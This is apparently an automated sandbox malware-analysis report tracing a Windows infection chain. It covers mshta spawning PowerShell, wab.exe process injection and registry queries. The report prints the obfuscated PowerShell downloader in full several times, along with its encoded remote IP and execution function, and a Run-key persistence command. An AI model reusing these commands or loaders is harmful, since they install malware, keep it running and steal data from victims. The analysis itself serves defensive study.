mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teS Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtfhsudaxgbogptlufigqqhs" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$kostplanen = 1;$farvervej='substrin';$farvervej+='g';function bortledede($heksekedlen220){$electrostatic=$heksekedlen220.length-$kostplanen;for($lsehovederne=4; $lsehovederne -lt $electrostatic; $lsehovederne+=(5)){$teaseled+=$heksekedlen220.$farvervej.invoke($lsehovederne, $kostplanen);}$teaseled;}function oraklerne($forpagtnigsafgiftens110){. ($attackman) ($forpagtnigsafgiftens110);}$rheophore=bortledede 'bullm eftotur,zsikkiq.aflb ssl prea rew/udlb5tetr.bill0over quic( ro,wiodiif rgn g.sdlando afgwcykes.agt bracn fl,tbrok pic,1jetm0lagr.megi0sho.; app antiwlaicisygenhymn6f,rr4 unf;.rov alvaxazox6wapa4 del;paca pro.r hydvoutl:u.de1pea.2 sca1.ntr.e.mo0slap)n.nc windg ablecompc untkhor,o ,ei/slre2.rol0 fir1 u,a0pann0bag.1sten0fort1 arm re,f katia acrunreeprp fco,sonaphx cl / an,1bero2inds1trlb.mu k0an.i ';$prologfortolkere=bortledede 'ophru jrsmaage gonrsk b-massapentgun,se retnha rt,nar ';$renprisen=bortledede 'arthhkurdtcy,itramppgabe:hedt/ .ig/ anv8flyt7 hom.extr1 ype2pree1fris.bol 1lovp0post5cott.samm1p,th6 ma 3 dis/ dnsbefouflinbteodua hemsandb,eapisheelforgi,ishcpyntanar lpar . mardskufw lemp pos ';$burgessdom=bortledede 'w,ip>til ';$attackman=bortledede 'reisi,once,agaxr.gi ';$robaades='skjolddragerens';oraklerne (bortledede 'd.sis .pvetec.tcoll-elecc uniobevinm.katl jle p,rnh.sht,rem van,-recupta taovertmassh ,el ro.dtsiou: bru\tschtdesceproglprefee.ptfbarbosemirh,alb odirenons,rid erre rovlfremsomkoe udbndgndssagv.f rstspirxresutlett i os-nonsv v,sa loelsisbufritegain exo$undlrlithodedibstttalocoasol,dresee fowsconv;sogg ');oraklerne (bortledede 'plagifor,f for d.to( opvttaste chrsgrnstmid.- forp eftafas,t,tophartu koittst g:ande\ cysts,are atalaflae.dmof,efiolnovrpantbex,si vi.nlsepdska emalul heas vege fornparas,ore.m.set carxhiertancr) p,e{fogeetranxraadikerntkirk}syn,;kase ');$baetylic = bortledede 'kulte,ondce,saha atotouc nono% stea vilpi tepgly d troat drtli.ga cen%gara\ ,igi fosdhyp.e dasaeighlmandosvrtggesjistu.ccassaar,plpeal1b ef4rive3si.n.pab.cbaudhkla.oforr ter& d,n&a.gl konvevrdicbabbhcomponeoc s ta$ sem ';oraklerne (bortledede '.ype$infegb,atlfl,ko.ucubfritaex.alglo,:s mof ap,rcataothyrg r kmvuggeach,nvars=vare( frecmatempistd and spir/ant.cdigi pach$ f,rbprotashine cy t depyca,rlselvi fagcsucc)mora ');oraklerne (bortledede 'pres$lykngbedaltapeonakebtelpasvvnlraci:morbdsmotit pmscplfpw seouro.n tope skanstyrtflyvetrskn anch .reeformdpappeuplenf ld=st,t$.mlgrmeniemi.enamazp ar,rgr niamphskrydekug.nt,ng. mpsthrip undl secipondtaf k(spat$rre.b kakureflrkonsg .alesi.asfa csberrdslanos,olmisol),iat ');$renprisen=$disponentenheden[0];oraklerne (bortledede 'ma t$cherg spalc.unon.nebprecat.pclstoc:forfslevetfortaprist kriititasforetundei chik bilexer,ro.ersgadm=nonin soreautow,tan-umagomis.bloddj,tole .ufc biltvill reidshotby emos ectuninecocomv.ka.aescnhalvefngstomph.unwiwsu,mes.yrbtetrcslubldrggiju tes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$kostplanen = 1;$farvervej='substrin';$farvervej+='g';function bortledede($heksekedlen220){$electrostatic=$heksekedlen220.length-$kostplanen;for($lsehovederne=4; $lsehovederne -lt $electrostatic; $lsehovederne+=(5)){$teaseled+=$heksekedlen220.$farvervej.invoke($lsehovederne, $kostplanen);}$teaseled;}function oraklerne($forpagtnigsafgiftens110){. ($attackman) ($forpagtnigsafgiftens110);}$rheophore=bortledede 'bullm eftotur,zsikkiq.aflb ssl prea rew/udlb5tetr.bill0over quic( ro,wiodiif rgn g.sdlando afgwcykes.agt bracn fl,tbrok pic,1jetm0lagr.megi0sho.; app antiwlaicisygenhymn6f,rr4 unf;.rov alvaxazox6wapa4 del;paca pro.r hydvoutl:u.de1pea.2 sca1.ntr.e.mo0slap)n.nc windg ablecompc untkhor,o ,ei/slre2.rol0 fir1 u,a0pann0bag.1sten0fort1 arm re,f katia acrunreeprp fco,sonaphx cl / an,1bero2inds1trlb.mu k0an.i ';$prologfortolkere=bortledede 'ophru jrsmaage gonrsk b-massapentgun,se retnha rt,nar ';$renprisen=bortledede 'arthhkurdtcy,itramppgabe:hedt/ .ig/ anv8flyt7 hom.extr1 ype2pree1fris.bol 1lovp0post5cott.samm1p,th6 ma 3 dis/ dnsbefouflinbteodua hemsandb,eapisheelforgi,ishcpyntanar lpar . mardskufw lemp pos ';$burgessdom=bortledede 'w,ip>til ';$attackman=bortledede 'reisi,once,agaxr.gi ';$robaades='skjolddragerens';oraklerne (bortledede 'd.sis .pvetec.tcoll-elecc uniobevinm.katl jle p,rnh.sht,rem van,-recupta taovertmassh ,el ro.dtsiou: bru\tschtdesceproglprefee.ptfbarbosemirh,alb odirenons,rid erre rovlfremsomkoe udbndgndssagv.f rstspirxresutlett i os-nonsv v,sa loelsisbufritegain exo$undlrlithodedibstttalocoasol,dresee fowsconv;sogg ');oraklerne (bortledede 'plagifor,f for d.to( opvttaste chrsgrnstmid.- forp eftafas,t,tophartu koittst g:ande\ cysts,are atalaflae.dmof,efiolnovrpantbex,si vi.nlsepdska emalul heas vege fornparas,ore.m.set carxhiertancr) p,e{fogeetranxraadikerntkirk}syn,;kase ');$baetylic = bortledede 'kulte,ondce,saha atotouc nono% stea vilpi tepgly d troat drtli.ga cen%gara\ ,igi fosdhyp.e dasaeighlmandosvrtggesjistu.ccassaar,plpeal1b ef4rive3si.n.pab.cbaudhkla.oforr ter& d,n&a.gl konvevrdicbabbhcomponeoc s ta$ sem ';oraklerne (bortledede '.ype$infegb,atlfl,ko.ucubfritaex.alglo,:s mof ap,rcataothyrg r kmvuggeach,nvars=vare( frecmatempistd and spir/ant.cdigi pach$ f,rbprotashine cy t depyca,rlselvi fagcsucc)mora ');oraklerne (bortledede 'pres$lykngbedaltapeonakebtelpasvvnlraci:morbdsmotit pmscplfpw seouro.n tope skanstyrtflyvetrskn anch .reeformdpappeuplenf ld=st,t$.mlgrmeniemi.enamazp ar,rgr niamphskrydekug.nt,ng. mpsthrip undl secipondtaf k(spat$rre.b kakureflrkonsg .alesi.asfa csberrdslanos,olmisol),iat ');$renprisen=$disponentenheden[0];oraklerne (bortledede 'ma t$cherg spalc.unon.nebprecat.pclstoc:forfslevetfortaprist kriititasforetundei chik bilexer,ro.ersgadm=nonin soreautow,tan-umagomis.bloddj,tole .ufc biltvill reidshotby emos ectuninecocomv.ka.aescnhalvefngstomph.unwiwsu,mes.yrbtetrcslubldrggiju tes
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$kostplanen = 1;$farvervej='substrin';$farvervej+='g';function bortledede($heksekedlen220){$electrostatic=$heksekedlen220.length-$kostplanen;for($lsehovederne=4; $lsehovederne -lt $electrostatic; $lsehovederne+=(5)){$teaseled+=$heksekedlen220.$farvervej.invoke($lsehovederne, $kostplanen);}$teaseled;}function oraklerne($forpagtnigsafgiftens110){. ($attackman) ($forpagtnigsafgiftens110);}$rheophore=bortledede 'bullm eftotur,zsikkiq.aflb ssl prea rew/udlb5tetr.bill0over quic( ro,wiodiif rgn g.sdlando afgwcykes.agt bracn fl,tbrok pic,1jetm0lagr.megi0sho.; app antiwlaicisygenhymn6f,rr4 unf;.rov alvaxazox6wapa4 del;paca pro.r hydvoutl:u.de1pea.2 sca1.ntr.e.mo0slap)n.nc windg ablecompc untkhor,o ,ei/slre2.rol0 fir1 u,a0pann0bag.1sten0fort1 arm re,f katia acrunreeprp fco,sonaphx cl / an,1bero2inds1trlb.mu k0an.i ';$prologfortolkere=bortledede 'ophru jrsmaage gonrsk b-massapentgun,se retnha rt,nar ';$renprisen=bortledede 'arthhkurdtcy,itramppgabe:hedt/ .ig/ anv8flyt7 hom.extr1 ype2pree1fris.bol 1lovp0post5cott.samm1p,th6 ma 3 dis/ dnsbefouflinbteodua hemsandb,eapisheelforgi,ishcpyntanar lpar . mardskufw lemp pos ';$burgessdom=bortledede 'w,ip>til ';$attackman=bortledede 'reisi,once,agaxr.gi ';$robaades='skjolddragerens';oraklerne (bortledede 'd.sis .pvetec.tcoll-elecc uniobevinm.katl jle p,rnh.sht,rem van,-recupta taovertmassh ,el ro.dtsiou: bru\tschtdesceproglprefee.ptfbarbosemirh,alb odirenons,rid erre rovlfremsomkoe udbndgndssagv.f rstspirxresutlett i os-nonsv v,sa loelsisbufritegain exo$undlrlithodedibstttalocoasol,dresee fowsconv;sogg ');oraklerne (bortledede 'plagifor,f for d.to( opvttaste chrsgrnstmid.- forp eftafas,t,tophartu koittst g:ande\ cysts,are atalaflae.dmof,efiolnovrpantbex,si vi.nlsepdska emalul heas vege fornparas,ore.m.set carxhiertancr) p,e{fogeetranxraadikerntkirk}syn,;kase ');$baetylic = bortledede 'kulte,ondce,saha atotouc nono% stea vilpi tepgly d troat drtli.ga cen%gara\ ,igi fosdhyp.e dasaeighlmandosvrtggesjistu.ccassaar,plpeal1b ef4rive3si.n.pab.cbaudhkla.oforr ter& d,n&a.gl konvevrdicbabbhcomponeoc s ta$ sem ';oraklerne (bortledede '.ype$infegb,atlfl,ko.ucubfritaex.alglo,:s mof ap,rcataothyrg r kmvuggeach,nvars=vare( frecmatempistd and spir/ant.cdigi pach$ f,rbprotashine cy t depyca,rlselvi fagcsucc)mora ');oraklerne (bortledede 'pres$lykngbedaltapeonakebtelpasvvnlraci:morbdsmotit pmscplfpw seouro.n tope skanstyrtflyvetrskn anch .reeformdpappeuplenf ld=st,t$.mlgrmeniemi.enamazp ar,rgr niamphskrydekug.nt,ng. mpsthrip undl secipondtaf k(spat$rre.b kakureflrkonsg .alesi.asfa csberrdslanos,olmisol),iat ');$renprisen=$disponentenheden[0];oraklerne (bortledede 'ma t$cherg spalc.unon.nebprecat.pclstoc:forfslevetfortaprist kriititasforetundei chik bilexer,ro.ersgadm=nonin soreautow,tan-umagomis.bloddj,tole .ufc biltvill reidshotby emos ectuninecocomv.ka.aescnhalvefngstomph.unwiwsu,mes.yrbtetrcslubldrggiju tes Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$kostplanen = 1;$farvervej='substrin';$farvervej+='g';function bortledede($heksekedlen220){$electrostatic=$heksekedlen220.length-$kostplanen;for($lsehovederne=4; $lsehovederne -lt $electrostatic; $lsehovederne+=(5)){$teaseled+=$heksekedlen220.$farvervej.invoke($lsehovederne, $kostplanen);}$teaseled;}function oraklerne($forpagtnigsafgiftens110){. ($attackman) ($forpagtnigsafgiftens110);}$rheophore=bortledede 'bullm eftotur,zsikkiq.aflb ssl prea rew/udlb5tetr.bill0over quic( ro,wiodiif rgn g.sdlando afgwcykes.agt bracn fl,tbrok pic,1jetm0lagr.megi0sho.; app antiwlaicisygenhymn6f,rr4 unf;.rov alvaxazox6wapa4 del;paca pro.r hydvoutl:u.de1pea.2 sca1.ntr.e.mo0slap)n.nc windg ablecompc untkhor,o ,ei/slre2.rol0 fir1 u,a0pann0bag.1sten0fort1 arm re,f katia acrunreeprp fco,sonaphx cl / an,1bero2inds1trlb.mu k0an.i ';$prologfortolkere=bortledede 'ophru jrsmaage gonrsk b-massapentgun,se retnha rt,nar ';$renprisen=bortledede 'arthhkurdtcy,itramppgabe:hedt/ .ig/ anv8flyt7 hom.extr1 ype2pree1fris.bol 1lovp0post5cott.samm1p,th6 ma 3 dis/ dnsbefouflinbteodua hemsandb,eapisheelforgi,ishcpyntanar lpar . mardskufw lemp pos ';$burgessdom=bortledede 'w,ip>til ';$attackman=bortledede 'reisi,once,agaxr.gi ';$robaades='skjolddragerens';oraklerne (bortledede 'd.sis .pvetec.tcoll-elecc uniobevinm.katl jle p,rnh.sht,rem van,-recupta taovertmassh ,el ro.dtsiou: bru\tschtdesceproglprefee.ptfbarbosemirh,alb odirenons,rid erre rovlfremsomkoe udbndgndssagv.f rstspirxresutlett i os-nonsv v,sa loelsisbufritegain exo$undlrlithodedibstttalocoasol,dresee fowsconv;sogg ');oraklerne (bortledede 'plagifor,f for d.to( opvttaste chrsgrnstmid.- forp eftafas,t,tophartu koittst g:ande\ cysts,are atalaflae.dmof,efiolnovrpantbex,si vi.nlsepdska emalul heas vege fornparas,ore.m.set carxhiertancr) p,e{fogeetranxraadikerntkirk}syn,;kase ');$baetylic = bortledede 'kulte,ondce,saha atotouc nono% stea vilpi tepgly d troat drtli.ga cen%gara\ ,igi fosdhyp.e dasaeighlmandosvrtggesjistu.ccassaar,plpeal1b ef4rive3si.n.pab.cbaudhkla.oforr ter& d,n&a.gl konvevrdicbabbhcomponeoc s ta$ sem ';oraklerne (bortledede '.ype$infegb,atlfl,ko.ucubfritaex.alglo,:s mof ap,rcataothyrg r kmvuggeach,nvars=vare( frecmatempistd and spir/ant.cdigi pach$ f,rbprotashine cy t depyca,rlselvi fagcsucc)mora ');oraklerne (bortledede 'pres$lykngbedaltapeonakebtelpasvvnlraci:morbdsmotit pmscplfpw seouro.n tope skanstyrtflyvetrskn anch .reeformdpappeuplenf ld=st,t$.mlgrmeniemi.enamazp ar,rgr niamphskrydekug.nt,ng. mpsthrip undl secipondtaf k(spat$rre.b kakureflrkonsg .alesi.asfa csberrdslanos,olmisol),iat ');$renprisen=$disponentenheden[0];oraklerne (bortledede 'ma t$cherg spalc.unon.nebprecat.pclstoc:forfslevetfortaprist kriititasforetundei chik bilexer,ro.ersgadm=nonin soreautow,tan-umagomis.bloddj,tole .ufc biltvill reidshotby emos ectuninecocomv.ka.aescnhalvefngstomph.unwiwsu,mes.yrbtetrcslubldrggiju tes Jump to behavior
Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerles\*YG
Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229604457.0000000007377000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerles\*
Source: wab.exe, 0000000A.00000002.3229604457.0000000007377000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager0
Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerles\*sG
Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managernet/OG
Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerles}G
Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp, mvourhjs.dat.10.dr Binary or memory string: [2024/05/02 01:15:11 Program Manager]
Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerd996cahG
Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager5
Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerd996caaG
Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp, mvourhjs.dat.10.dr Binary or memory string: [2024/05/02 01:15:01 Program Manager]
Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerles
Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.00000000072F8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Contains functionality to query CPU information (cpuid)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22C92933 cpuid 10_2_22C92933
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
